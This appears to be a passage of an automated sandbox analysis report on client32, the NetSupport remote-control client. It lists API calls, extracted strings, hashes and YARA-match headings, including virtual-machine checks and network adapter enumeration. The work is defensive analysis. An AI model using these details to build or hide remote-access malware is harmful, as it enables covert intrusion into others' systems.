                                                                                                • String ID: *LineSpeed$Limit transmission speed to %d bps?$NetSupport$_Debug
                                                                                                • API String ID: 1064562911-2508291834
                                                                                                • Opcode ID: bd72269edf071e76bb9c985e48eb0691b81fbc19e7ab098a844548e8b85de6de
                                                                                                • Instruction ID: d4c4cfbc85170497fbe999a7e46ec2e91a87d06ccbedf5391c27f03f52861bc7
                                                                                                • Opcode Fuzzy Hash: bd72269edf071e76bb9c985e48eb0691b81fbc19e7ab098a844548e8b85de6de
                                                                                                • Instruction Fuzzy Hash: 6221E4B1D011589BEF04DFA4DE69B5D73B8EF45318F5041B9EB0AAB580E7309D44CB50
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 74472576-4108050209
                                                                                                • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                                                • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                                                APIs
                                                                                                • UnDecorator::UScore.LIBCMT ref: 69D19FD1
                                                                                                • DName::DName.LIBCMT ref: 69D19FDD
                                                                                                  • Part of subcall function 69D17CA8: DName::doPchar.LIBCMT ref: 69D17CD9
                                                                                                • UnDecorator::getScopedName.LIBCMT ref: 69D1A01C
                                                                                                • DName::operator+=.LIBCMT ref: 69D1A026
                                                                                                • DName::operator+=.LIBCMT ref: 69D1A035
                                                                                                • DName::operator+=.LIBCMT ref: 69D1A041
                                                                                                • DName::operator+=.LIBCMT ref: 69D1A04E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                • String ID: void
                                                                                                • API String ID: 1480779885-3531332078
                                                                                                • Opcode ID: b13e8b6c6da2c015f102a824cb8661f9d3ab844279846f8a8a5a2b626162f351
                                                                                                • Instruction ID: 752a9eac3cd1b30cac5c4eefb27c3056019ac96b15d7b68ec65dc5eba774c1ad
                                                                                                • Opcode Fuzzy Hash: b13e8b6c6da2c015f102a824cb8661f9d3ab844279846f8a8a5a2b626162f351
                                                                                                • Instruction Fuzzy Hash: A511C677908104EFD709CF64E955FAD7BB0AF01314F4480B5D0069B6B5DB30DA49C761
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                                                • String ID:
                                                                                                • API String ID: 1094208222-0
                                                                                                • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                                • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                                                • Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                                • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • _memset.LIBCMT ref: 110433A9
                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem$__wcstoi64_memset
                                                                                                • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                                                • API String ID: 3760389471-710950153
                                                                                                • Opcode ID: a4a48406d0813789af030b6d0da3969e719553fd5b853badafc9dea947eccc83
                                                                                                • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                                                • Opcode Fuzzy Hash: a4a48406d0813789af030b6d0da3969e719553fd5b853badafc9dea947eccc83
                                                                                                • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • _memset.LIBCMT ref: 69CF141D
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?,?,?,00000000), ref: 69CF1678
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,00000000), ref: 69CF16C8
                                                                                                • std::exception::exception.LIBCMT ref: 69CF1740
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF175B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection_memset$EnterException@8LeaveThrow_mallocstd::exception::exceptionwsprintf
                                                                                                • String ID: END_REC$MORE$RESULT$b
                                                                                                • API String ID: 285166177-3141901015
                                                                                                • Opcode ID: 9e114797c7fb8699f24d12db97be72ec9d86b67f03547b554ef9d367caa6b6d9
                                                                                                • Instruction ID: 08ba2066f33fe0a8c4dce911de0aafd760de14825bfebe36db83c92e673bc7b6
                                                                                                • Opcode Fuzzy Hash: 9e114797c7fb8699f24d12db97be72ec9d86b67f03547b554ef9d367caa6b6d9
                                                                                                • Instruction Fuzzy Hash: 378190F5C012599BDF90DFA4AC80AEEB6B4FF04208F44557AE10AA6240F7314B9ACB56
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CE6DFD
                                                                                                • #16.WSOCK32(69CEA730,?,00000001,00000000,?,69CEA730,?,00002000,,?,69CEACF4,00000000,00000000,?,?), ref: 69CE6E4C
                                                                                                • WSASetLastError.WSOCK32(00002747,?,69CEA730,?,00002000,,?,69CEACF4,00000000,00000000,?,?,?,00001001,?,00000004), ref: 69CE6F25
                                                                                                • WSASetLastError.WSOCK32(00002745,69CEA730,?,00000001,00000000,?,69CEA730,?,00002000,,?,69CEACF4,00000000,00000000,?,?), ref: 69CE6F36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_memset
                                                                                                • String ID: $Content-Length:$HTTP/
                                                                                                • API String ID: 536390146-1146010681
                                                                                                • Opcode ID: 76906bdc81f43b88cda9fbfde32d0f1fe6613a81202c28bc6ff5a28b6afa9553
                                                                                                • Instruction ID: 52bc1e8d2fa8cc25534800ebdf9e346967c00442c4578015092e8321f214fcae
                                                                                                • Opcode Fuzzy Hash: 76906bdc81f43b88cda9fbfde32d0f1fe6613a81202c28bc6ff5a28b6afa9553
                                                                                                • Instruction Fuzzy Hash: 403124B6A64B012BE701CF64FF65B6B32686F51389F009038FF1A876C1FB31D10581A1
                                                                                                APIs
                                                                                                Strings
                                                                                                • PackedCatalogItem, xrefs: 110156E2
                                                                                                • %012d, xrefs: 11015674
                                                                                                • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                                                • NSLSP, xrefs: 11015708
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: QueryValue_memsetwsprintf
                                                                                                • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                • API String ID: 1333399081-1346142259
                                                                                                • Opcode ID: 29f9011e3ada9e7bd91b50f2f931db6d5ceb57e52f479653d1e62c62b495717e
                                                                                                • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                                                • Opcode Fuzzy Hash: 29f9011e3ada9e7bd91b50f2f931db6d5ceb57e52f479653d1e62c62b495717e
                                                                                                • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
                                                                                                APIs
                                                                                                  • Part of subcall function 69D00D40: LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 69D00D48
                                                                                                  • Part of subcall function 69D00D40: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses,00000000,?,00001001,?,00000004,?,00000000,00000000), ref: 69D00D5B
                                                                                                  • Part of subcall function 69D00D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-69D2CB4C,?,00001001,?,00000004,?,00000000,00000000), ref: 69D00D76
                                                                                                  • Part of subcall function 69D00D40: _free.LIBCMT ref: 69D00D84
                                                                                                  • Part of subcall function 69D00D40: _malloc.LIBCMT ref: 69D00D8C
                                                                                                  • Part of subcall function 69D00D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,00001001,?,00000004,?,00000000), ref: 69D00D9F
                                                                                                  • Part of subcall function 69D00D40: _free.LIBCMT ref: 69D00DAF
                                                                                                  • Part of subcall function 69D00970: LoadLibraryA.KERNEL32(ws2_32.dll), ref: 69D009A6
                                                                                                  • Part of subcall function 69D00970: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 69D009C3
                                                                                                  • Part of subcall function 69D00970: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 69D009CD
                                                                                                  • Part of subcall function 69D00970: GetProcAddress.KERNEL32(00000000,socket), ref: 69D009DB
                                                                                                  • Part of subcall function 69D00970: GetProcAddress.KERNEL32(00000000,closesocket), ref: 69D009E9
                                                                                                  • Part of subcall function 69D00970: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 69D009F7
                                                                                                  • Part of subcall function 69D00970: FreeLibrary.KERNEL32(00000000), ref: 69D00A6C
                                                                                                • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 69D00FF6
                                                                                                • GetProcAddress.KERNEL32(00000000,ntohl), ref: 69D0100C
                                                                                                • _malloc.LIBCMT ref: 69D01020
                                                                                                • _free.LIBCMT ref: 69D010E5
                                                                                                • FreeLibrary.KERNEL32(?), ref: 69D010FA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Library$Load_free$AdaptersAddressesFree_malloc
                                                                                                • String ID: ntohl$ws2_32.dll
                                                                                                • API String ID: 4086026317-4165132517
                                                                                                • Opcode ID: 1c6b6f1a2cf23186498a40c764aec1eb0983e4af217201f16deb5795c20ed5a1
                                                                                                • Instruction ID: f38377cc2fb1ccd726b35c41f6a1ef07864372e2d235709c7a158fb9e030831f
                                                                                                • Opcode Fuzzy Hash: 1c6b6f1a2cf23186498a40c764aec1eb0983e4af217201f16deb5795c20ed5a1
                                                                                                • Instruction Fuzzy Hash: 6F4161B59042599BDB24DF24CD6079A73F9BF45348F10C4B9D989A3640EF359A84CFE0
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CE7F26
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,?,-000397EB,?), ref: 69CE7FF9
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,-000397EB,?), ref: 69CE8047
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,?,-000397EB,?), ref: 69CE8052
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,-000397EB,?), ref: 69CE806A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$_memset
                                                                                                • String ID: RESULT$b
                                                                                                • API String ID: 920729587-4141403093
                                                                                                • Opcode ID: 939b1689dd7e48ed6ea0925dbfe9f4e55830af6f0ec3794d82d763e4d8249999
                                                                                                • Instruction ID: fac3be4e6335cf1b91f8ecf75f0913b75626b986ad5e7d7f57672fc89ef9f7ac
                                                                                                • Opcode Fuzzy Hash: 939b1689dd7e48ed6ea0925dbfe9f4e55830af6f0ec3794d82d763e4d8249999
                                                                                                • Instruction Fuzzy Hash: 914193B4C002099FEF10DF60ED41BAEBAB4EF05308F009075DA0AE6641F7759A54DBB5
                                                                                                APIs
                                                                                                  • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                                  • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                                  • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                                  • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                                  • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 110935E9
                                                                                                • SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 11093640
                                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$qu
                                                                                                • API String ID: 3136964118-4145319076
                                                                                                APIs
                                                                                                • GetWindowPlacement.USER32(00000000,0000002C), ref: 110B9594
                                                                                                • MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001), ref: 110B9606
                                                                                                • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                                • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                                • API String ID: 1092798621-1973987134
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 69CE102B
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_malloc
                                                                                                • String ID: @$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=$VUUU$base64.cpp$cchOut >= cchWorst$pszOut
                                                                                                • API String ID: 501242067-340907830
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CE7C8D
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,00000000,-000397EB,?), ref: 69CE7D18
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,00000000,-000397EB,?), ref: 69CE7D68
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,?,00000000,-000397EB,?), ref: 69CE7D6F
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,00000000,-000397EB,?), ref: 69CE7D83
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$_memset
                                                                                                • String ID: RESULT$b
                                                                                                • API String ID: 920729587-4141403093
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$iAt+nUnits<=Length()$iAt>=0 && iAt<Length()$nUnits>=0
                                                                                                • API String ID: 4104443479-3492528137
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: IsA()$NSMString.cpp$iAt<=m_nLength$iAt>=0$pszStr!=NULL
                                                                                                • API String ID: 4104443479-3876480746
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _sprintf
                                                                                                • String ID: %02X%02X%02X%02X%02X%02X$0000000000$02004C4F4F50$VIRTNET$VMware$Virtual
                                                                                                • API String ID: 1467051239-555777999
                                                                                                APIs
                                                                                                • _memmove.LIBCMT ref: 1108132F
                                                                                                • _memset.LIBCMT ref: 11081318
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
                                                                                                • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                                                • API String ID: 75970324-4264523126
                                                                                                • Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                                • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                                                • Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                                • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 69D00BB8
                                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 69D00BCB
                                                                                                • _malloc.LIBCMT ref: 69D00BF3
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • _free.LIBCMT ref: 69D00BEB
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69D00C10
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                • String ID: GetAdaptersInfo$IPHLPAPI.DLL
                                                                                                • API String ID: 1157017740-2359281783
                                                                                                • Opcode ID: 62537afe8b21d2e6ba78bb9120013e618afbcdaf8c00ee52cc42b48f8f95ccbc
                                                                                                • Instruction ID: d59a73effd7e95a31a3462b27bf42c61cff5cf00c2bb2ab5bd8d1e28279334ff
                                                                                                • Opcode Fuzzy Hash: 62537afe8b21d2e6ba78bb9120013e618afbcdaf8c00ee52cc42b48f8f95ccbc
                                                                                                • Instruction Fuzzy Hash: CBF0A4B6500341AFE6249F75DDA4E0B76ECAF46648700883CE656C7D00EB35E445C734
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$Find$Sleep
                                                                                                • String ID: PCIVideoSlave32
                                                                                                • API String ID: 2137649973-2496367574
                                                                                                • Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                                • Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
                                                                                                • Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                                • Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777
                                                                                                APIs
                                                                                                • LoadMenuA.USER32 ref: 1100340E
                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 1100343A
                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 1100345C
                                                                                                • DestroyMenu.USER32 ref: 1100346A
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                • API String ID: 468487828-934300333
                                                                                                • Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                                • Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
                                                                                                • Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                                • Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
                                                                                                APIs
                                                                                                • LoadMenuA.USER32 ref: 1100331D
                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                                • GetMenuItemCount.USER32(00000000), ref: 11003367
                                                                                                • DestroyMenu.USER32 ref: 11003379
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                • API String ID: 4241058051-934300333
                                                                                                • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                                • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
